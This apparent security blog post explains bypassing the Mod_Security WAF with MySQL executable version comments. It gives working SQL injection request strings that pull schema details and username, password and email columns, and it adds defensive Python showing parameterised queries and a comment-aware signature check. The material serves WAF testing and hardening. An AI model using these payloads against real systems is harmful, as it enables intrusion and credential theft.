When will I get around to testing this..
A method that I discovered today in the MySQL documentation struck me with its simplicity and with the fact that I had not noticed it before. Let me describe this method of bypassing a WAF.
MySQL servers allow comments of the following two types:
    /*!sql-code*/
    /*!12345sql-code*/
As can be noticed, in both cases the SQL code inside the comment is executed! The second form means that "sql-code" is executed only if the DBMS version is the given value or later (12345 stands for version 1.23.45).
As I have repeatedly asserted [1, 2], some WAFs skip comments during signature search. Among them is the latest stable build of Mod_Security (v. 2.5.9).
Here is a simple example:
...
// the raw value of the id parameter is concatenated straight into the SQL text
$query = "SELECT name FROM table where id = ".$_GET['id'];
$result = mysql_query($query);
...
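As an added illustration (not part of the original post), here is the concatenation above next to its parameterised counterpart, written in Python against an in-memory SQLite table that stands in for the page's "table". The table name `users` and the sample rows are constructed for the example; SQLite is used only because it runs anywhere, and since it treats MySQL's `/*!...*/` constructions as ordinary comments, the plain `1 union select 1` request from the page is used as the input.

```python
import sqlite3
from typing import List


def open_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the application's table (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def build_query_unsafely(user_id: str) -> str:
    """Same construction as the PHP snippet: the raw GET value becomes part of the SQL text."""
    return "SELECT name FROM users WHERE id = " + user_id


def names_unsafely(conn: sqlite3.Connection, user_id: str) -> List[str]:
    """Runs the concatenated query; whatever SQL the caller sent is parsed as SQL."""
    return [str(row[0]) for row in conn.execute(build_query_unsafely(user_id))]


def names_safely(conn: sqlite3.Connection, user_id: str) -> List[str]:
    """Hardened form: the value is bound as a parameter and is never parsed as SQL,
    so no comment trick can turn it into a UNION."""
    cur = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))
    return [str(row[0]) for row in cur]


if __name__ == "__main__":
    db = open_sample_db()
    print(names_unsafely(db, "1"), names_safely(db, "1"))
    # the concatenated version returns an extra row; the bound version returns nothing
    print(sorted(names_unsafely(db, "1 union select 1")), names_safely(db, "1 union select 1"))
```

Binding the value does not depend on the WAF at all: the server receives the statement and the parameter separately, so the question of which comments the signature engine skips never arises for this query.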
If a web application is protected with Mod_Security, then the following request will be forbidden:
/?id=1+union+select+1
It is remarkable that even these requests (which are incorrect in the considered example) will also be blocked by the WAF (HPP/HPF techniques):
/?id=1+union/*&id=*/select+table_name+from+information_schema.columns
/?id=1+union/*&blabla1=*/select+table_name&blabla2=from+information_schema.columns

But if we use the described method with comments, Mod_Security will allow our requests, and we will be able to exploit the SQL injection:
/?id=1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/
/?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/
/?id=1/*!limit+0+union+select+concat_ws(0x3a,username,password,email)+from+users*/
Well, one more method to our arsenal :-)
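Added here from the defender's side (this is not code from the original article or from Mod_Security): a small Python normaliser that treats MySQL version comments the way the server does, keeping the body of `/*!...*/` and `/*!12345...*/` and discarding ordinary `/*...*/`, so that a UNION/SELECT signature still fires on the requests shown above. The `comment_skipping_view` function models a WAF that drops every comment, which is the behaviour the article describes. The regular expressions, the handling of the five-digit version prefix and the minimal signature are my simplifications; the sample strings are the page's own request values.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*! ... */ and /*!NNNNN ... */ (the server compares NNNNN
# with its own version); ordinary /* ... */ comments are discarded. Allowing up to five
# digits is an assumption that matches the documented /*!12345 form.
VERSION_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.DOTALL)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# Minimal stand-in for a WAF signature; real rule sets are far broader.
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE)

# Constructed from the request values quoted in the article (the id= part only).
VERSION_COMMENT_VALUE = ("1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)"
                         "+from+information_schema.columns*/")
VERSIONED_VALUE = ("1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)"
                   "+from+information_schema.columns*/")
# The first HPP request, taken as one raw string before any parameter splitting.
HPP_VALUE = "1+union/*&id=*/select+table_name+from+information_schema.columns"


def _collapse(text: str) -> str:
    return re.sub(r"\s+", " ", text).strip()


def comment_skipping_view(raw_value: str) -> str:
    """What a signature engine sees if it drops every /* */ comment before matching."""
    return _collapse(PLAIN_COMMENT.sub(" ", unquote_plus(raw_value)))


def normalize_like_mysql(raw_value: str) -> str:
    """Keep the executable body of version comments, then drop the ordinary ones."""
    decoded = unquote_plus(raw_value)
    kept = VERSION_COMMENT.sub(lambda m: " " + m.group(1) + " ", decoded)
    return _collapse(PLAIN_COMMENT.sub(" ", kept))


def matches_signature(text: str) -> bool:
    return UNION_SELECT.search(text) is not None


def verdicts(raw_value: str) -> dict:
    """Signature result under both views, for one request value."""
    return {
        "comment_skipping": matches_signature(comment_skipping_view(raw_value)),
        "mysql_aware": matches_signature(normalize_like_mysql(raw_value)),
    }


if __name__ == "__main__":
    for value in (VERSION_COMMENT_VALUE, VERSIONED_VALUE, HPP_VALUE):
        print(value[:40], verdicts(value))
```

The point of the two views is that the comment-skipping engine reports nothing for the version-comment requests while the MySQL-aware normalisation exposes the same `limit 0 union select` text in both of them; the HPP request is caught under either view, which is consistent with the article's observation that Mod_Security blocks it.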